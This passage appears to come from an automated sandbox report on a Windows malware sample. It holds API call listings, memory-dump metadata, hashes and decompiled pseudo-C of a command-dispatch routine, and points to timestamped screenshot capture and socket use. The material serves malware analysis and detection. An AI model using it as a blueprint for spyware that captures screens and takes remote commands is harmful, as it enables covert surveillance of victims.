                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                          • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                        • String ID: image/jpeg
                                        • API String ID: 1042780377-3785015651
                                        • Opcode ID: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                        • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                        • Opcode Fuzzy Hash: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                        • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _EH_prolog.MSVCRT ref: 00410B20
                                        • GdiplusStartup.GDIPLUS(0041BF18,?,00000000,00000000,00000000,00000000), ref: 00410B59
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410B79
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410B85
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000001A), ref: 00410BAA
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 00410BBC
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410BDC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BE8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BF4
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00410BFD
                                        • CreateDirectoryW.KERNEL32(00000000), ref: 00410C04
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C17
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C2A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00415898), ref: 00410C89
                                        • Sleep.KERNEL32(000003E8), ref: 00410CA6
                                        • GetLocalTime.KERNEL32(?), ref: 00410CB1
                                        • swprintf.MSVCRT(?,00416AC0,?,?,?,?,?,?), ref: 00410CF4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,?,00415898), ref: 00410D1A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415898), ref: 00410D2A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,00415898), ref: 00410D3A
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00415898), ref: 00410D49
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D55
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D61
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D6D
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,00415898), ref: 00410D7D
                                          • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                          • Part of subcall function 0041093F: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                          • Part of subcall function 0041093F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                          • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                          • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                          • Part of subcall function 0041093F: SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                          • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                          • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                          • Part of subcall function 0041093F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                          • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                          • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                          • Part of subcall function 0041093F: DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                          • Part of subcall function 0041093F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                          • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                          • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                          • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                          • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015,?,?,?,?,?,?,?,00415898), ref: 00410D9B
                                        • atoi.MSVCRT ref: 00410DA2
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00415898), ref: 00410DB0
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,00415898), ref: 00410DC9
                                        • atoi.MSVCRT ref: 00410DD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$G@1@@G@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?data@?$basic_string@V01@$?size@?$basic_string@CreateSleepatoi$?length@?$basic_string@D@1@@DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimeswprintf
                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                        • API String ID: 2994672083-3790400642
                                        • Opcode ID: 7a11f7ef75dea44434b4bed565def541b1dad23d80d8a0557a62dd92252c596e
                                        • Instruction ID: 09d63aef6d3d8e876cb0f678efb75e9f291bc689162efedecff38abdc591dce5
                                        • Opcode Fuzzy Hash: 7a11f7ef75dea44434b4bed565def541b1dad23d80d8a0557a62dd92252c596e
                                        • Instruction Fuzzy Hash: 9C71A37190061DEBCB15ABA0DC8DBEE7778AB84305F1480AAF509A7191EB784AC58F5C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 21%
                                        			E00410F04(intOrPtr* __eax, void* __eflags, char _a8) {
                                        				char _v20;
                                        				char _v24;
                                        				char _v40;
                                        				char _v56;
                                        				char _v72;
                                        				char _v88;
                                        				char _v104;
                                        				char _v120;
                                        				char _v136;
                                        				char _v152;
                                        				char _v168;
                                        				char _v184;
                                        				char _v200;
                                        				char _v216;
                                        				void* _t69;
                                        				void* _t74;
                                        				void* _t75;
                                        				void* _t76;
                                        				void* _t78;
                                        				char* _t83;
                                        				void* _t85;
                                        				void* _t86;
                                        				void* _t88;
                                        				char* _t92;
                                        				void* _t94;
                                        				void* _t95;
                                        				void* _t97;
                                        				char* _t101;
                                        				void* _t103;
                                        				void* _t104;
                                        				void* _t106;
                                        				char* _t110;
                                        				void* _t112;
                                        				char* _t118;
                                        				char* _t119;
                                        				char* _t120;
                                        				intOrPtr* _t123;
                                        				void* _t125;
                                        				void* _t127;
                                        				char* _t130;
                                        				char* _t135;
                                        				char* _t136;
                                        				char* _t137;
                                        				intOrPtr _t139;
                                        				void* _t230;
                                        				void* _t233;
                                        				void* _t235;
                                        				void* _t236;
                                        				void* _t241;
                                        				void* _t242;
                                        				void* _t247;
                                        				void* _t248;
                                        				void* _t253;
                                        				void* _t254;
                                        				void* _t264;
                                        				void* _t265;
                                        
                                        				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                        				_t139 =  *__eax;
                                        				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z( *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                        				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(__eflags,  &_v20,  &_a8, 0x41b310,  &_v40,  &_v40, 1);
                                        				_t233 = _t230 + 0x24;
                                        				_t69 = _t139 - 1;
                                        				if(_t69 == 0) {
                                        					E00412855(_t233 - 0xc, _t233 - 0xc, E004113C9( &_v216));
                                        					E004020C2(0x41c130);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(0x79);
                                        					L26:
                                        					_t74 = E004017DD( &_v20);
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return _t74;
                                        				}
                                        				_t75 = _t69 - 1;
                                        				if(_t75 == 0) {
                                        					_t76 = E004119AD( &_v20, 0);
                                        					_t235 = _t233 - 0x10;
                                        					_push(_t76);
                                        					E00412881(_t76);
                                        					_t78 = E00411700(_t235);
                                        					_t236 = _t235 + 0x10;
                                        					__eflags = _t78;
                                        					if(_t78 == 0) {
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                        						_push(0x80);
                                        						L14:
                                        						E004020C2(0x41c130);
                                        						goto L26;
                                        					}
                                        					_push(E004119AD( &_v20, 1));
                                        					_push(0x41b310);
                                        					_push(E004119AD( &_v20, 0));
                                        					_t83 =  &_v184;
                                        					_push(_t83);
                                        					L00414140();
                                        					_push(_t83);
                                        					L00414140();
                                        					E004020C2(0x41c130, 0x7a, _t236 - 0x10);
                                        					L23:
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					goto L26;
                                        				}
                                        				_t85 = _t75 - 1;
                                        				if(_t85 == 0) {
                                        					_t86 = E004119AD( &_v20, 0);
                                        					_t241 = _t233 - 0x10;
                                        					_push(_t86);
                                        					E00412881(_t86);
                                        					_t88 = E00411760(_t241);
                                        					_t242 = _t241 + 0x10;
                                        					__eflags = _t88;
                                        					if(_t88 == 0) {
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                        						_push(0x81);
                                        						goto L14;
                                        					}
                                        					_push(E004119AD( &_v20, 1));
                                        					_push(0x41b310);
                                        					_push(E004119AD( &_v20, 0));
                                        					_t92 =  &_v152;
                                        					_push(_t92);
                                        					L00414140();
                                        					_push(_t92);
                                        					L00414140();
                                        					E004020C2(0x41c130, 0x7b, _t242 - 0x10);
                                        					goto L23;
                                        				}
                                        				_t94 = _t85 - 1;
                                        				if(_t94 == 0) {
                                        					_t95 = E004119AD( &_v20, 0);
                                        					_t247 = _t233 - 0x10;
                                        					_push(_t95);
                                        					E00412881(_t95);
                                        					_t97 = E00411859(_t247);
                                        					_t248 = _t247 + 0x10;
                                        					__eflags = _t97;
                                        					if(_t97 == 0) {
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                        						_push(0x82);
                                        						goto L14;
                                        					}
                                        					_push(E004119AD( &_v20, 1));
                                        					_push(0x41b310);
                                        					_push(E004119AD( &_v20, 0));
                                        					_t101 =  &_v120;
                                        					_push(_t101);
                                        					L00414140();
                                        					_push(_t101);
                                        					L00414140();
                                        					E004020C2(0x41c130, 0x7c, _t248 - 0x10);
                                        					goto L23;
                                        				}
                                        				_t103 = _t94 - 1;
                                        				if(_t103 == 0) {
                                        					_t104 = E004119AD( &_v20, 0);
                                        					_t253 = _t233 - 0x10;
                                        					_push(_t104);
                                        					E00412881(_t104);
                                        					_t106 = E004118C0(_t253);
                                        					_t254 = _t253 + 0x10;
                                        					__eflags = _t106;
                                        					if(_t106 == 0) {
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                        						_push(0x83);
                                        						goto L14;
                                        					}
                                        					_push(E004119AD( &_v20, 1));
                                        					_push(0x41b310);
                                        					_push(E004119AD( &_v20, 0));
                                        					_t110 =  &_v88;
                                        					_push(_t110);
                                        					L00414140();
                                        					_push(_t110);
                                        					L00414140();
                                        					E004020C2(0x41c130, 0x7d, _t254 - 0x10);
                                        					goto L23;
                                        				}
                                        				_t112 = _t103 - 1;
                                        				if(_t112 == 0) {
                                        					E00412881(_t113);
                                        					_v24 = E004117C7(_t233 - 0x10);
                                        					_t118 =  &_v72;
                                        					L00414140();
                                        					_t119 =  &_v136;
                                        					L00414140();
                                        					_t120 =  &_v56;
                                        					L00414140();
                                        					L0041417C();
                                        					E004020C2(0x41c130, 0x7f, _t233 - 0x10);
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t120, _t120, _t119, _t119, _t118, _t118, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, _v24, E004119AD( &_v20, 0));
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					goto L23;
                                        				}
                                        				if(_t112 != 1) {
                                        					goto L26;
                                        				}
                                        				_t123 = E004119AD( &_v20, 2);
                                        				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                        				_push( *_t123);
                                        				_t125 = E004119AD( &_v20, 0);
                                        				_t264 = _t233 - 0x10;
                                        				_push(_t125);
                                        				_push(_t264);
                                        				E00412881(_t125);
                                        				_t127 = E00411927();
                                        				_t265 = _t264 + 0x14;
                                        				if(_t127 == 0) {
                                        					_push(E004119AD( &_v20, 1));
                                        					_push(0x41b310);
                                        					_push(E004119AD( &_v20, 0));
                                        					_t130 =  &_v104;
                                        					_push(_t130);
                                        					L00414140();
                                        					_push(_t130);
                                        					L00414140();
                                        					E004020C2(0x41c130, 0x84, _t265 - 0x10);
                                        				} else {
                                        					_t135 =  &_v200;
                                        					L00414140();
                                        					_t136 =  &_v168;
                                        					L00414140();
                                        					_t137 =  &_v40;
                                        					L00414140();
                                        					L00414140();
                                        					E004020C2(0x41c130, 0x7e, _t265 - 0x10);
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t137, _t137, _t136, _t136, _t135, _t135, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, E004119AD( &_v20, 2));
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				}
                                        				goto L23;
                                        			}
                                        0x00410f16
                                        0x00410f1c
                                        0x00410f2e
                                        0x00410f38
                                        0x00410f41
                                        0x00410f52
                                        0x00410f61
                                        0x00410f6b
                                        0x00410f73
                                        0x00410f76
                                        0x00410f77
                                        0x00411394
                                        0x004113a2
                                        0x004113ad
                                        0x004113b3
                                        0x004113b6
                                        0x004113be
                                        0x004113c8
                                        0x004113c8
                                        0x00410f7d
                                        0x00410f7e
                                        0x004112f5
                                        0x004112fa
                                        0x004112ff
                                        0x00411301
                                        0x00411308
                                        0x0041130d
                                        0x00411310
                                        0x00411312
                                        0x00411371
                                        0x00411377
                                        0x004111ce
                                        0x004111d3
                                        0x00000000
                                        0x004111d3
                                        0x00411326
                                        0x00411327
                                        0x0041132e
                                        0x0041132f
                                        0x00411335
                                        0x00411336
                                        0x0041133e
                                        0x00411340
                                        0x0041134f
                                        0x0041135a
                                        0x0041135a
                                        0x00000000
                                        0x0041135a
                                        0x00410f84
                                        0x00410f85
                                        0x00411268
                                        0x0041126d
                                        0x00411272
                                        0x00411274
                                        0x0041127b
                                        0x00411280
                                        0x00411283
                                        0x00411285
                                        0x004112e1
                                        0x004112e7
                                        0x00000000
                                        0x004112e7
                                        0x00411299
                                        0x0041129a
                                        0x004112a1
                                        0x004112a2
                                        0x004112a8
                                        0x004112a9
                                        0x004112b1
                                        0x004112b3
                                        0x004112c2
                                        0x00000000
                                        0x004112c7
                                        0x00410f8b
                                        0x00410f8c
                                        0x004111e1
                                        0x004111e6
                                        0x004111eb
                                        0x004111ed
                                        0x004111f4
                                        0x004111f9
                                        0x004111fc
                                        0x004111fe
                                        0x00411254
                                        0x0041125a
                                        0x00000000
                                        0x0041125a
                                        0x00411212
                                        0x00411213
                                        0x0041121a
                                        0x0041121b
                                        0x0041121e
                                        0x0041121f
                                        0x00411227
                                        0x00411229
                                        0x00411238
                                        0x00000000
                                        0x0041123d
                                        0x00410f92
                                        0x00410f93
                                        0x00411150
                                        0x00411155
                                        0x0041115a
                                        0x0041115c
                                        0x00411163
                                        0x00411168
                                        0x0041116b
                                        0x0041116d
                                        0x004111c3
                                        0x004111c9
                                        0x00000000
                                        0x004111c9
                                        0x00411181
                                        0x00411182
                                        0x00411189
                                        0x0041118a
                                        0x0041118d
                                        0x0041118e
                                        0x00411196
                                        0x00411198
                                        0x004111a7
                                        0x00000000
                                        0x004111ac
                                        0x00410f99
                                        0x00410f9a
                                        0x004110c5
                                        0x004110d1
                                        0x004110f0
                                        0x004110f4
                                        0x004110fd
                                        0x00411104
                                        0x0041110d
                                        0x00411111
                                        0x0041111b
                                        0x0041112a
                                        0x00411132
                                        0x0041113e
                                        0x00000000
                                        0x00411144
                                        0x00410fa1
                                        0x00000000
                                        0x00000000
                                        0x00410fad
                                        0x00410fb4
                                        0x00410fbf
                                        0x00410fc1
                                        0x00410fc6
                                        0x00410fcb
                                        0x00410fcc
                                        0x00410fcd
                                        0x00410fd4
                                        0x00410fd9
                                        0x00410fde
                                        0x0041107f
                                        0x00411080
                                        0x00411087
                                        0x00411088
                                        0x0041108b
                                        0x0041108c
                                        0x00411094
                                        0x00411096
                                        0x004110a8
                                        0x00410fe4
                                        0x0041100b
                                        0x00411012
                                        0x0041101b
                                        0x00411022
                                        0x0041102b
                                        0x0041102f
                                        0x00411039
                                        0x00411048
                                        0x00411050
                                        0x0041105c
                                        0x00411062
                                        0x00000000

                                        APIs
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410F16
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,69D65DF0), ref: 00410F2E
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410F38
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410F41
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00410F52
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410F61
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,00000000), ref: 00411012
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000), ref: 00411022
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 0041102F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007E,?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411050
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 0041105C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411039
